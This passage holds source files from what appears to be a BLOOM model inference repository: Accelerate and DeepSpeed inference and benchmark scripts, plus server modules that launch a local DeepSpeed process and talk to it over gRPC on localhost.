 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ # File: transformers-bloom-inference-main/bloom-inference-scripts/bloom-accelerate-inference.py
2
+ import argparse
3
+ import gc
4
+ import math
5
+ import os
6
+ import time
7
+ import torch
8
+ import torch.distributed as dist
9
+ from transformers import AutoConfig, AutoModelForCausalLM, AutoTokenizer
10
+
11
+ def get_args():
12
+ parser = argparse.ArgumentParser()
13
+ parser.add_argument('--local_rank', required=False, type=int, help='used by dist launchers')
14
+ parser.add_argument('--name', type=str, help='Name path', required=True)
15
+ parser.add_argument('--batch_size', default=1, type=int, help='batch size')
16
+ parser.add_argument('--benchmark', action='store_true', help='additionally run benchmark')
17
+ parser.add_argument('--greedy', action='store_true')
18
+ parser.add_argument('--top-k', type=int, default=0)
19
+ parser.add_argument('--top-p', type=float, default=0.0)
20
+ parser.add_argument('--dtype', type=str, help='float16 or int8', choices=['int8', 'float16'], default='float16')
21
+ return parser.parse_args()
22
+ t_start = time.time()
23
+ num_tokens = 100
24
+ args = get_args()
25
+ local_rank = int(os.getenv('LOCAL_RANK', '0'))
26
+ world_size = torch.cuda.device_count()
27
+ rank = local_rank
28
+
29
+ def print_rank0(*msg):
30
+ if rank != 0:
31
+ return
32
+ print(*msg)
33
+ print_rank0(f'Using {world_size} gpus')
34
+ model_name = args.name
35
+ print_rank0(f'Loading model {model_name}')
36
+ tokenizer = AutoTokenizer.from_pretrained(model_name)
37
+ dtype = torch.bfloat16 if model_name in ['bigscience/bloom', 'bigscience/bigscience-small-testing'] else torch.float16
38
+ infer_dtype = args.dtype
39
+ if infer_dtype == 'int8':
40
+ dtype = torch.int8
41
+ kwargs = dict(device_map='auto')
42
+
43
+ def get_world_size() -> int:
44
+ if dist.is_initialized():
45
+ return dist.get_world_size()
46
+ else:
47
+ return 1
48
+ if get_world_size() > 1:
49
+ kwargs['device_map'] = 'balanced_low_0'
50
+ if infer_dtype == 'int8':
51
+ print_rank0('Using `load_in_8bit=True` to use quanitized model')
52
+ kwargs['load_in_8bit'] = True
53
+ else:
54
+ kwargs['torch_dtype'] = dtype
55
+ model = AutoModelForCausalLM.from_pretrained(model_name, **kwargs)
56
+ if args.benchmark:
57
+ t_ready = time.time()
58
+ print_rank0(f'*** Starting to generate {num_tokens} tokens with bs={args.batch_size}')
59
+ input_sentences = ['DeepSpeed is a machine learning framework', 'He is working on', 'He has a', 'He got all', 'Everyone is happy and I can', 'The new movie that got Oscar this year', 'In the far far distance from our galaxy,', 'Peace is the only way']
60
+ if args.batch_size > len(input_sentences):
61
+ input_sentences *= math.ceil(args.batch_size / len(input_sentences))
62
+ generate_kwargs = dict(max_new_tokens=num_tokens, do_sample=False)
63
+ print_rank0(f'Generate args {generate_kwargs}')
64
+ inputs = input_sentences[:args.batch_size]
65
+
66
+ def generate():
67
+ input_tokens = tokenizer.batch_encode_plus(inputs, return_tensors='pt', padding=True)
68
+ for t in input_tokens:
69
+ if torch.is_tensor(input_tokens[t]):
70
+ input_tokens[t] = input_tokens[t].to('cuda:0')
71
+ outputs = model.generate(**input_tokens, **generate_kwargs)
72
+ input_tokens_lengths = [x.shape[0] for x in input_tokens.input_ids]
73
+ output_tokens_lengths = [x.shape[0] for x in outputs]
74
+ total_new_tokens = [o - i for (i, o) in zip(input_tokens_lengths, output_tokens_lengths)]
75
+ outputs = tokenizer.batch_decode(outputs, skip_special_tokens=True)
76
+ return zip(inputs, outputs, total_new_tokens)
77
+ print_rank0('*** Running generate')
78
+ t_generate_start = time.time()
79
+ generated = generate()
80
+ t_generate_span = time.time() - t_generate_start
81
+ for (i, o, _) in generated:
82
+ print_rank0(f"{'-' * 60}\nin={i}\nout={o}\n")
83
+ if args.benchmark:
84
+ torch.cuda.empty_cache()
85
+ gc.collect()
86
+ print_rank0('*** Running benchmark')
87
+ for i in range(1):
88
+ _ = generate()
89
+ torch.cuda.synchronize()
90
+ t0 = time.time()
91
+ cycles = 5
92
+ total_new_tokens_generated = 0
93
+ for i in range(cycles):
94
+ generated = generate()
95
+ total_new_tokens_generated += sum((new_tokens for (_, _, new_tokens) in generated))
96
+ torch.cuda.synchronize()
97
+ throughput = (time.time() - t0) / total_new_tokens_generated
98
+ print_rank0(f'\n*** Performance stats:\nThroughput per token including tokenize: {throughput * 1000:.2f} msecs\nStart to ready to generate: {t_ready - t_start:.3f} secs\nTokenize and generate {total_new_tokens_generated} (bs={args.batch_size}) tokens: {t_generate_span:.3f} secs\nStart to finish: {t_ready - t_start + t_generate_span:.3f} secs\n')
99
+
100
+ # File: transformers-bloom-inference-main/bloom-inference-scripts/bloom-ds-inference.py
101
+ import gc
102
+ import io
103
+ import json
104
+ import math
105
+ import os
106
+ import time
107
+ from argparse import ArgumentParser
108
+ from pathlib import Path
109
+ import torch
110
+ import torch.distributed as dist
111
+ import deepspeed
112
+ from huggingface_hub import snapshot_download
113
+ from transformers import AutoConfig, AutoModelForCausalLM, AutoTokenizer
114
+ from transformers.models.bloom.modeling_bloom import BloomBlock as BloomBlock
115
+ from transformers.utils import is_offline_mode
116
+ tp_presharded_models = ['microsoft/bloom-deepspeed-inference-int8', 'microsoft/bloom-deepspeed-inference-fp16']
117
+ t_start = time.time()
118
+ num_tokens = 100
119
+ parser = ArgumentParser()
120
+ parser.add_argument('--name', required=True, type=str, help='model_name')
121
+ parser.add_argument('--dtype', type=str, help='float16 or int8', choices=['int8', 'float16'], default='float16')
122
+ parser.add_argument('--local_rank', required=False, type=int, help='used by dist launchers')
123
+ parser.add_argument('--batch_size', default=1, type=int, help='batch size')
124
+ parser.add_argument('--benchmark', action='store_true', help='additionally run benchmark')
125
+ args = parser.parse_args()
126
+ local_rank = int(os.getenv('LOCAL_RANK', '0'))
127
+ world_size = int(os.getenv('WORLD_SIZE', '1'))
128
+ deepspeed.init_distributed('nccl')
129
+ rank = dist.get_rank()
130
+
131
+ def print_rank0(*msg):
132
+ if rank != 0:
133
+ return
134
+ print(*msg)
135
+
136
+ def get_repo_root(model_name_or_path):
137
+ if is_offline_mode():
138
+ print_rank0('Offline mode: forcing local_files_only=True')
139
+ if rank == 0:
140
+ snapshot_download(model_name_or_path, local_files_only=is_offline_mode(), cache_dir=os.getenv('TRANSFORMERS_CACHE', None), ignore_patterns=['*.safetensors'])
141
+ dist.barrier()
142
+ return snapshot_download(model_name_or_path, local_files_only=is_offline_mode(), cache_dir=os.getenv('TRANSFORMERS_CACHE', None), ignore_patterns=['*.safetensors'])
143
+
144
+ def get_checkpoint_files(model_name_or_path):
145
+ cached_repo_dir = get_repo_root(model_name_or_path)
146
+ file_list = [str(entry) for entry in Path(cached_repo_dir).rglob('*.[bp][it][n]') if entry.is_file()]
147
+ return file_list
148
+ model_name = args.name
149
+ infer_dtype = args.dtype
150
+ tp_presharded_mode = True if model_name in tp_presharded_models else False
151
+ print_rank0(f'*** Loading the model {model_name}')
152
+ tokenizer = AutoTokenizer.from_pretrained(model_name)
153
+ config = AutoConfig.from_pretrained(model_name)
154
+ kernel_inject = True
155
+ if kernel_inject:
156
+ dtype = torch.float16
157
+ else:
158
+ dtype = torch.bfloat16
159
+ if args.benchmark:
160
+ torch.cuda.empty_cache()
161
+ gc.collect()
162
+ deepspeed.runtime.utils.see_memory_usage('pre-from-pretrained', force=True)
163
+ with deepspeed.OnDevice(dtype=dtype, device='meta'):
164
+ model = AutoModelForCausalLM.from_config(config, torch_dtype=torch.bfloat16)
165
+ if args.benchmark:
166
+ deepspeed.runtime.utils.see_memory_usage('post-from-pretrained', force=True)
167
+ model = model.eval()
168
+ if args.benchmark:
169
+ torch.cuda.empty_cache()
170
+ gc.collect()
171
+ deepspeed.runtime.utils.see_memory_usage('post-init-ds-zero-init', force=True)
172
+ checkpoints_json = 'checkpoints.json'
173
+
174
+ def write_checkpoints_json():
175
+ checkpoint_files = get_checkpoint_files(model_name)
176
+ if rank == 0:
177
+ data = {'type': 'BLOOM', 'checkpoints': checkpoint_files, 'version': 1.0}
178
+ json.dump(data, open(checkpoints_json, 'w'))
179
+ if args.benchmark:
180
+ torch.cuda.empty_cache()
181
+ gc.collect()
182
+ deepspeed.runtime.utils.see_memory_usage('pre-ds-inference-init', force=True)
183
+ if kernel_inject:
184
+ kwargs = dict(replace_with_kernel_inject=True)
185
+ else:
186
+ kwargs = dict(injection_policy={BloomBlock: ('self_attention.dense', 'mlp.dense_4h_to_h')})
187
+ repo_root = get_repo_root(model_name)
188
+ if tp_presharded_mode:
189
+ checkpoints_json = os.path.join(repo_root, 'ds_inference_config.json')
190
+ else:
191
+ write_checkpoints_json()
192
+ dist.barrier()
193
+ model = deepspeed.init_inference(model, mp_size=world_size, base_dir=repo_root, dtype=getattr(torch, infer_dtype), checkpoint=checkpoints_json, **kwargs)
194
+ if args.benchmark:
195
+ torch.cuda.empty_cache()
196
+ gc.collect()
197
+ deepspeed.runtime.utils.see_memory_usage('post-ds-inference-init', force=True)
198
+ model = model.module
199
+ if args.benchmark:
200
+ t_ready = time.time()
201
+ print_rank0(f'*** Starting to generate {num_tokens} tokens with bs={args.batch_size}')
202
+ input_sentences = ['DeepSpeed is a machine learning framework', 'He is working on', 'He has a', 'He got all', 'Everyone is happy and I can', 'The new movie that got Oscar this year', 'In the far far distance from our galaxy,', 'Peace is the only way']
203
+ if args.batch_size > len(input_sentences):
204
+ input_sentences *= math.ceil(args.batch_size / len(input_sentences))
205
+ generate_kwargs = dict(max_new_tokens=num_tokens, do_sample=False)
206
+ print_rank0(f'Generate args {generate_kwargs}')
207
+ inputs = input_sentences[:args.batch_size]
208
+
209
+ def generate():
210
+ input_tokens = tokenizer.batch_encode_plus(inputs, return_tensors='pt', padding=True)
211
+ for t in input_tokens:
212
+ if torch.is_tensor(input_tokens[t]):
213
+ input_tokens[t] = input_tokens[t].to(torch.cuda.current_device())
214
+ outputs = model.generate(**input_tokens, **generate_kwargs)
215
+ input_tokens_lengths = [x.shape[0] for x in input_tokens.input_ids]
216
+ output_tokens_lengths = [x.shape[0] for x in outputs]
217
+ total_new_tokens = [o - i for (i, o) in zip(input_tokens_lengths, output_tokens_lengths)]
218
+ outputs = tokenizer.batch_decode(outputs, skip_special_tokens=True)
219
+ return zip(inputs, outputs, total_new_tokens)
220
+ print_rank0('*** Running generate warmup')
221
+ _ = generate()
222
+ print_rank0('*** Running generate')
223
+ t_generate_start = time.time()
224
+ generated = generate()
225
+ t_generate_span = time.time() - t_generate_start
226
+ for (i, o, _) in generated:
227
+ print_rank0(f"{'-' * 60}\nin={i}\nout={o}\n")
228
+ if args.benchmark:
229
+ torch.cuda.empty_cache()
230
+ gc.collect()
231
+ deepspeed.runtime.utils.see_memory_usage('end-of-run', force=True)
232
+ if args.benchmark:
233
+ print_rank0('*** Running benchmark')
234
+ for i in range(1):
235
+ _ = generate()
236
+ torch.cuda.synchronize()
237
+ t0 = time.time()
238
+ cycles = 5
239
+ total_new_tokens_generated = 0
240
+ for i in range(cycles):
241
+ generated = generate()
242
+ total_new_tokens_generated += sum((new_tokens for (_, _, new_tokens) in generated))
243
+ torch.cuda.synchronize()
244
+ throughput = (time.time() - t0) / total_new_tokens_generated
245
+ print_rank0(f'\n*** Performance stats:\nThroughput per token including tokenize: {throughput * 1000:.2f} msecs\nStart to ready to generate: {t_ready - t_start:.3f} secs\nTokenize and generate {total_new_tokens_generated} (bs={args.batch_size}) tokens: {t_generate_span:.3f} secs\nStart to finish: {t_ready - t_start + t_generate_span:.3f} secs\n')
246
+
247
+ # File: transformers-bloom-inference-main/bloom-inference-scripts/bloom-ds-zero-inference.py
248
+ import gc
249
+ import math
250
+ import os
251
+ import time
252
+ from argparse import ArgumentParser
253
+ import torch
254
+ import torch.distributed as dist
255
+ import deepspeed
256
+ from transformers import AutoConfig, AutoModelForCausalLM, AutoTokenizer
257
+ from transformers.deepspeed import HfDeepSpeedConfig
258
+ from transformers.models.bloom.modeling_bloom import BloomBlock as BloomBlock
259
+ t_start = time.time()
260
+ num_tokens = 100
261
+ parser = ArgumentParser()
262
+ parser.add_argument('--name', required=True, type=str, help='model_name')
263
+ parser.add_argument('--local_rank', required=False, type=int, help='used by dist launchers')
264
+ parser.add_argument('--batch_size', default=1, type=int, help='batch size')
265
+ parser.add_argument('--benchmark', action='store_true', help='additionally run benchmark')
266
+ parser.add_argument('--cpu_offload', action='store_true', help='whether to activate CPU offload')
267
+ parser.add_argument('--nvme_offload_path', help='whether to activate NVME offload and the path on nvme')
268
+ args = parser.parse_args()
269
+ local_rank = int(os.getenv('LOCAL_RANK', '0'))
270
+ world_size = int(os.getenv('WORLD_SIZE', '1'))
271
+ deepspeed.init_distributed('nccl')
272
+ rank = dist.get_rank()
273
+
274
+ def print_rank0(*msg):
275
+ if rank != 0:
276
+ return
277
+ print(*msg)
278
+ model_name = args.name
279
+ print_rank0(f'*** Loading the model {model_name}')
280
+ tokenizer = AutoTokenizer.from_pretrained(model_name)
281
+ config = AutoConfig.from_pretrained(model_name)
282
+ dtype = torch.bfloat16 if model_name in ['bigscience/bloom', 'bigscience/bigscience-small-testing'] else torch.float16
283
+ model_hidden_size = config.hidden_size
284
+ train_batch_size = 1 * world_size
285
+ ds_config = {'fp16': {'enabled': dtype == torch.float16}, 'bf16': {'enabled': dtype == torch.bfloat16}, 'zero_optimization': {'stage': 3, 'overlap_comm': True, 'contiguous_gradients': True, 'reduce_bucket_size': model_hidden_size * model_hidden_size, 'stage3_prefetch_bucket_size': 0.9 * model_hidden_size * model_hidden_size, 'stage3_param_persistence_threshold': 0}, 'steps_per_print': 2000, 'train_batch_size': train_batch_size, 'train_micro_batch_size_per_gpu': 1, 'wall_clock_breakdown': False}
286
+ if args.cpu_offload and args.nvme_offload_path:
287
+ raise ValueError('Use one of --cpu_offload or --nvme_offload_path and not both')
288
+ if args.cpu_offload:
289
+ ds_config['zero_optimization']['offload_param'] = dict(device='cpu', pin_memory=True)
290
+ if args.nvme_offload_path:
291
+ ds_config['zero_optimization']['offload_param'] = dict(device='nvme', pin_memory=True, nvme_path=args.nvme_offload_path, buffer_size=4000000000.0)
292
+ dschf = HfDeepSpeedConfig(ds_config)
293
+ if args.benchmark:
294
+ torch.cuda.empty_cache()
295
+ gc.collect()
296
+ deepspeed.runtime.utils.see_memory_usage('pre-from-pretrained', force=True)
297
+ model = AutoModelForCausalLM.from_pretrained(model_name, torch_dtype=torch.bfloat16)
298
+ if args.benchmark:
299
+ deepspeed.runtime.utils.see_memory_usage('post-from-pretrained', force=True)
300
+ model = model.eval()
301
+ print_rank0(ds_config)
302
+ ds_engine = deepspeed.initialize(model=model, config_params=ds_config)[0]
303
+ ds_engine.module.eval()
304
+ model = ds_engine.module
305
+ if args.benchmark:
306
+ t_ready = time.time()
307
+ deepspeed.runtime.utils.see_memory_usage('start-of-generate', force=True)
308
+ print_rank0(f'*** Starting to generate {num_tokens} tokens with bs={args.batch_size}')
309
+ input_sentences = ['DeepSpeed is a machine learning framework', 'He is working on', 'He has a', 'He got all', 'Everyone is happy and I can', 'The new movie that got Oscar this year', 'In the far far distance from our galaxy,', 'Peace is the only way']
310
+ if args.batch_size > len(input_sentences):
311
+ input_sentences *= math.ceil(args.batch_size / len(input_sentences))
312
+ generate_kwargs = dict(max_new_tokens=num_tokens, do_sample=False)
313
+ print_rank0(f'Generate args {generate_kwargs}')
314
+ inputs = input_sentences[:args.batch_size]
315
+
316
+ def generate():
317
+ input_tokens = tokenizer.batch_encode_plus(inputs, return_tensors='pt', padding=True)
318
+ for t in input_tokens:
319
+ if torch.is_tensor(input_tokens[t]):
320
+ input_tokens[t] = input_tokens[t].to(torch.cuda.current_device())
321
+ outputs = model.generate(**input_tokens, **generate_kwargs)
322
+ input_tokens_lengths = [x.shape[0] for x in input_tokens.input_ids]
323
+ output_tokens_lengths = [x.shape[0] for x in outputs]
324
+ total_new_tokens = [o - i for (i, o) in zip(input_tokens_lengths, output_tokens_lengths)]
325
+ outputs = tokenizer.batch_decode(outputs, skip_special_tokens=True)
326
+ return zip(inputs, outputs, total_new_tokens)
327
+ print_rank0('*** Running generate')
328
+ t_generate_start = time.time()
329
+ pairs = generate()
330
+ t_generate_span = time.time() - t_generate_start
331
+ for (i, o, _) in pairs:
332
+ print_rank0(f"{'-' * 60}\nin={i}\nout={o}\n")
333
+ if args.benchmark:
334
+ torch.cuda.empty_cache()
335
+ gc.collect()
336
+ deepspeed.runtime.utils.see_memory_usage('end-of-generate', force=True)
337
+ print_rank0('*** Running benchmark')
338
+ for i in range(1):
339
+ _ = generate()
340
+ torch.cuda.synchronize()
341
+ t0 = time.time()
342
+ cycles = 5
343
+ total_new_tokens_generated = 0
344
+ for i in range(cycles):
345
+ generated = generate()
346
+ total_new_tokens_generated += sum((new_tokens for (_, _, new_tokens) in generated))
347
+ torch.cuda.synchronize()
348
+ total_new_tokens_generated *= world_size
349
+ throughput = (time.time() - t0) / total_new_tokens_generated
350
+ print_rank0(f'\n*** Performance stats:\nThroughput per token including tokenize: {throughput * 1000:.2f} msecs\nStart to ready to generate: {t_ready - t_start:.3f} secs\nTokenize and generate {total_new_tokens_generated} (bs={args.batch_size}) tokens: {t_generate_span:.3f} secs\nStart to finish: {t_ready - t_start + t_generate_span:.3f} secs\n')
351
+
352
+ # File: transformers-bloom-inference-main/inference_server/benchmark.py
353
+ import argparse
354
+ import gc
355
+ from functools import partial
356
+ import torch
357
+ from .constants import DS_INFERENCE, DS_ZERO
358
+ from .model_handler.deployment import ModelDeployment
359
+ from .models import start_inference_engine
360
+ from .utils import GenerateRequest, create_generate_request, get_argument_parser, get_dummy_batch, get_world_size, parse_args, print_rank_0, run_and_log_time
361
+
362
+ def benchmark_generation(model: ModelDeployment, request: GenerateRequest, cycles: int=5):
363
+ total_new_tokens_generated = 0
364
+ for _ in range(cycles):
365
+ response = model.generate(request=request)
366
+ total_new_tokens_generated += sum((new_tokens for new_tokens in response.num_generated_tokens))
367
+ return total_new_tokens_generated
368
+
369
+ def get_benchmark_results(benchmark_time: float, initialization_time: float, total_new_tokens_generated: int, batch_size: int, cycles: int) -> str:
370
+ throughput = total_new_tokens_generated / benchmark_time
371
+ latency = benchmark_time / cycles
372
+ return f'\n*** Performance stats:\nThroughput (including tokenization) = {throughput:.2f} tokens/sec\nThroughput (including tokenization) = {1000 / throughput:.2f} msecs/token\nModel loading time = {initialization_time:.2f} secs\nTotal tokens generated = {total_new_tokens_generated} with batch size = {batch_size}\nLatency = {latency:.2f} secs\nModel loading time + generation time per batch = {initialization_time + latency:.2f} secs\n'
373
+
374
+ def benchmark_end_to_end(args: argparse.Namespace) -> None:
375
+ (model, initialization_time) = run_and_log_time(partial(ModelDeployment, args=args, grpc_allowed=False))
376
+ request = create_generate_request(get_dummy_batch(args.batch_size), args.generate_kwargs)
377
+ print_rank_0(f'generate_kwargs = {args.generate_kwargs}')
378
+ print_rank_0(f'batch_size = {args.batch_size}')
379
+ response = model.generate(request=request)
380
+ for (i, (o, _)) in zip(request.text, zip(response.text, response.num_generated_tokens)):
381
+ print_rank_0(f"{'-' * 60}\nin = {i}\nout = {o}\n")
382
+ if args.benchmark_cycles > 0:
383
+ print_rank_0('*** Running benchmark')
384
+ torch.cuda.empty_cache()
385
+ gc.collect()
386
+ model.generate(request=request)
387
+ torch.cuda.synchronize()
388
+ (total_new_tokens_generated, benchmark_time) = run_and_log_time(partial(benchmark_generation, model=model, request=request, cycles=args.benchmark_cycles))
389
+ if args.deployment_framework == DS_ZERO:
390
+ total_new_tokens_generated *= get_world_size()
391
+ print_rank_0(get_benchmark_results(benchmark_time, initialization_time, total_new_tokens_generated, args.batch_size, args.benchmark_cycles))
392
+
393
+ def get_args() -> argparse.Namespace:
394
+ parser = get_argument_parser()
395
+ group = parser.add_argument_group(title='launch config')
396
+ group.add_argument('--benchmark_cycles', type=int, default=0, help='additionally run benchmark')
397
+ group.add_argument('--local_rank', required=False, type=int, help='used by dist launchers')
398
+ group.add_argument('--batch_size', default=1, type=int, help='batch size')
399
+ group.add_argument('--cpu_offload', action='store_true', help='whether to activate CPU offload for DS ZeRO')
400
+ args = parse_args(parser)
401
+ launched_with_deepspeed = args.deployment_framework in [DS_INFERENCE, DS_ZERO]
402
+ assert args.max_batch_size == None, 'max_batch_size is not supported with benchmark'
403
+ if not launched_with_deepspeed:
404
+ assert args.local_rank == None, 'local_rank must be None if not launched with DeepSpeed'
405
+ if args.cpu_offload:
406
+ assert args.deployment_framework == DS_ZERO, 'cpu_offload only works with DS_ZeRO'
407
+ return args
408
+
409
+ def main() -> None:
410
+ args = get_args()
411
+ start_inference_engine(args.deployment_framework)
412
+ benchmark_end_to_end(args)
413
+ if __name__ == '__main__':
414
+ main()
415
+
416
+ # File: transformers-bloom-inference-main/inference_server/cli.py
417
+ import argparse
418
+ import json
419
+ import sys
420
+ from .model_handler import ModelDeployment
421
+ from .utils import get_argument_parser, parse_args, print_rank_0
422
+
423
+ def get_args() -> argparse.Namespace:
424
+ parser = get_argument_parser()
425
+ args = parse_args(parser)
426
+ return args
427
+
428
+ def main() -> None:
429
+ args = get_args()
430
+ model = ModelDeployment(args, True)
431
+ generate_kwargs = args.generate_kwargs
432
+ while True:
433
+ input_text = input('Input text: ')
434
+ if input('change generate_kwargs? [y/n] ') == 'y':
435
+ while True:
436
+ try:
437
+ generate_kwargs = json.loads(input('Generate kwargs: '))
438
+ break
439
+ except Exception as e:
440
+ (e_type, e_message, _) = sys.exc_info()
441
+ print('error =', e_type.__name__)
442
+ print('message =', e_message)
443
+ continue
444
+ response = model.generate(text=[input_text], generate_kwargs=generate_kwargs)
445
+ print_rank_0('Output text:', response.text[0])
446
+ print_rank_0('Generated tokens:', response.num_generated_tokens[0])
447
+ if __name__ == '__main__':
448
+ main()
449
+
450
+ # File: transformers-bloom-inference-main/inference_server/download_model.py
451
+ import argparse
452
+ from inference_server.models import get_hf_model_class
453
+ from transformers import AutoConfig, AutoTokenizer
454
+
455
+ def get_args() -> argparse.Namespace:
456
+ parser = argparse.ArgumentParser()
457
+ parser.add_argument('--model_name', type=str, required=True, help='model to use')
458
+ parser.add_argument('--model_class', type=str, required=True, help='model class to use')
459
+ args = parser.parse_args()
460
+ return args
461
+
462
+ def main() -> None:
463
+ args = get_args()
464
+ print('downloading', args.model_name)
465
+ AutoConfig.from_pretrained(args.model_name)
466
+ AutoTokenizer.from_pretrained(args.model_name)
467
+ get_hf_model_class(args.model_class).from_pretrained(args.model_name)
468
+ if __name__ == '__main__':
469
+ main()
470
+
471
+ # File: transformers-bloom-inference-main/inference_server/model_handler/deployment.py
472
+ """"""
473
+ import argparse
474
+ import asyncio
475
+ import subprocess
476
+ import time
477
+ from typing import List
478
+ import grpc
479
+ from ..constants import DS_INFERENCE, DS_ZERO
480
+ from ..models import get_model_class, load_tokenizer
481
+ from ..utils import ForwardRequest, ForwardResponse, GenerateResponse, TokenizeRequest, TokenizeResponse, create_generate_request, get_cuda_visible_devices, get_str_dtype, get_world_size, print_rank_0
482
+ from .grpc_utils.pb import generation_pb2, generation_pb2_grpc
483
+
484
+ class ModelDeployment:
485
+
486
+ def __init__(self, args: argparse.Namespace, grpc_allowed: bool=False):
487
+ self.cuda_visible_devices = get_cuda_visible_devices()
488
+ self.num_gpus = get_world_size()
489
+ self.use_grpc_server = self.should_use_grpc(args.deployment_framework, grpc_allowed)
490
+ if self.use_grpc_server:
491
+ self.tokenizer = load_tokenizer(args.model_name)
492
+ self.initialize_ports()
493
+ self.dtype_proto_field = {str: 'svalue', int: 'ivalue', float: 'fvalue', bool: 'bvalue'}
494
+ self._initialize_service(args)
495
+ self._wait_until_server_is_live()
496
+ self.asyncio_loop = asyncio.get_event_loop()
497
+ self._initialize_grpc_client()
498
+ else:
499
+ self.model = get_model_class(args.deployment_framework)(args)
500
+ print_rank_0('model loaded')
501
+
502
+ def should_use_grpc(self, deployment_framework: str, grpc_allowed: bool) -> bool:
503
+ if grpc_allowed and get_world_size() > 1:
504
+ return deployment_framework in [DS_INFERENCE, DS_ZERO]
505
+ return False
506
+
507
+ def initialize_ports(self):
508
+ self.ports = []
509
+ for i in range(self.num_gpus):
510
+ self.ports.append(50950 + self.cuda_visible_devices[i])
511
+
512
+ def _is_socket_open(self, port):
513
+ import socket
514
+ sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
515
+ result = sock.connect_ex(('0.0.0.0', port))
516
+ sock.close()
517
+ return result == 0
518
+
519
+ def _is_server_process_alive(self):
520
+ if self.process is None:
521
+ return True
522
+ try:
523
+ self.process.wait(1)
524
+ except subprocess.TimeoutExpired as err:
525
+ is_alive = True
526
+ else:
527
+ is_alive = False
528
+ return is_alive
529
+
530
+ def _wait_until_server_is_live(self):
531
+ sockets_open = False
532
+ while not sockets_open:
533
+ sockets_open = self._is_socket_open(self.ports[0])
534
+ process_alive = self._is_server_process_alive()
535
+ if not process_alive:
536
+ raise RuntimeError('server crashed for some reason, unable to proceed')
537
+ time.sleep(4)
538
+ print_rank_0('waiting for server to start...')
539
+ print_rank_0(f'server has started on {self.ports[0]}')
540
+
541
+ def dict_to_proto(self, generate_kwargs: dict) -> dict:
542
+ result = {}
543
+ for (k, v) in generate_kwargs.items():
544
+ if v is not None:
545
+ x = generation_pb2.Value()
546
+ setattr(x, self.dtype_proto_field[type(v)], v)
547
+ result[k] = x
548
+ return result
549
+
550
+ def _initialize_service(self, args: argparse.Namespace):
551
+ if self._is_socket_open(self.ports[0]):
552
+ raise RuntimeError(f'Server is already running on port {self.ports}, please shutdown or use different port.')
553
+ if args.deployment_framework in [DS_INFERENCE, DS_ZERO]:
554
+ ports = ' '.join(map(str, self.ports))
555
+ cmd = f'inference_server.model_handler.launch --model_name {args.model_name} --deployment_framework {args.deployment_framework} --dtype {get_str_dtype(args.dtype)} --port {ports} --model_class {args.model_class}'
556
+ if args.max_batch_size is not None:
557
+ cmd += f' --max_batch_size {args.max_batch_size}'
558
+ if args.max_input_length is not None:
559
+ cmd += f' --max_input_length {args.max_input_length}'
560
+ master_port = 29500 + min(self.cuda_visible_devices)
561
+ cuda_visible_devices = ','.join(map(str, self.cuda_visible_devices))
562
+ cmd = f'deepspeed --master_port {master_port} --include localhost:{cuda_visible_devices} --module {cmd}'
563
+ else:
564
+ raise NotImplementedError(f'unsupported deployment_framework: {args.deployment_framework}')
565
+ cmd = cmd.split(' ')
566
+ self.process = subprocess.Popen(cmd)
567
+
568
+ def _initialize_grpc_client(self):
569
+ self.stubs = []
570
+ for i in self.ports:
571
+ channel = grpc.aio.insecure_channel(f'localhost:{i}')
572
+ stub = generation_pb2_grpc.GenerationServiceStub(channel)
573
+ self.stubs.append(stub)
574
+
575
+ async def generate_in_tensor_parallel(self, text: List[str], generate_kwargs: dict):
576
+ responses = []
577
+ for i in range(self.num_gpus):
578
+ responses.append(self.asyncio_loop.create_task(self.generate_async(i, text, generate_kwargs)))
579
+ await responses[0]
580
+ return responses[0]
581
+
582
+ async def generate_async(self, stub_id: int, text: List[str], generate_kwargs: dict):
583
+ req = generation_pb2.GenerationRequestProto(texts=text, generate_kwargs=generate_kwargs)
584
+ response = await self.stubs[stub_id].Generate(req)
585
+ return response
586
+
587
+ async def forward_in_tensor_parallel(self, conditioning_text: List[str], response: List[str]):
588
+ responses = []
589
+ for i in range(self.num_gpus):
590
+ responses.append(self.asyncio_loop.create_task(self.forward_async(i, conditioning_text, response)))
591
+ await responses[0]
592
+ return responses[0]
593
+
594
+ async def forward_async(self, stub_id: int, conditioning_text: List[str], response: List[str]):
595
+ req = generation_pb2.ForwardRequestProto(conditioning_text=conditioning_text, response=response)
596
+ response = await self.stubs[stub_id].Forward(req)
597
+ return response
598
+
599
+ def generate(self, **kwargs) -> GenerateResponse:
600
+ if self.use_grpc_server:
601
+ if 'request' in kwargs:
602
+ text = kwargs['request'].text
603
+ generate_kwargs = kwargs['request'].get_generate_kwargs()
604
+ else:
605
+ text = kwargs['text']
606
+ generate_kwargs = kwargs['generate_kwargs']
607
+ generate_kwargs = self.dict_to_proto(generate_kwargs)
608
+ response = self.asyncio_loop.run_until_complete(self.generate_in_tensor_parallel(text, generate_kwargs)).result()
609
+ if response.error:
610
+ raise Exception(response.error)
611
+ else:
612
+ return GenerateResponse(text=[r for r in response.texts], num_generated_tokens=[n for n in response.num_generated_tokens])
613
+ else:
614
+ if 'request' in kwargs:
615
+ request = kwargs['request']
616
+ else:
617
+ request = create_generate_request(**kwargs)
618
+ response = self.model.generate(request)
619
+ if isinstance(response, Exception):
620
+ raise response
621
+ else:
622
+ return response
623
+
624
+ def forward(self, request: ForwardRequest) -> ForwardResponse:
625
+ if self.use_grpc_server:
626
+ response = self.asyncio_loop.run_until_complete(self.forward_in_tensor_parallel(request.conditioning_text, request.response)).result()
627
+ if response.error:
628
+ raise Exception(response.error)
629
+ else:
630
+ return ForwardResponse(nll=response.nll)
631
+ else:
632
+ response = self.model.forward(request)
633
+ if isinstance(response, Exception):
634
+ raise response
635
+ else:
636
+ return response
637
+
638
+ def tokenize(self, request: TokenizeRequest) -> TokenizeResponse:
639
+ if self.use_grpc_server:
640
+ response = self.tokenizer(request.text, padding=request.padding)
641
+ response = TokenizeResponse(token_ids=response.input_ids, attention_mask=response.attention_mask)
642
+ else:
643
+ response = self.model.tokenize(request)
644
+ return response
645
+
646
+ # File: transformers-bloom-inference-main/inference_server/model_handler/grpc_utils/generation_server.py
647
+ import os
648
+ from concurrent import futures
649
+ import torch
650
+ import grpc
651
+ from ...models import Model
652
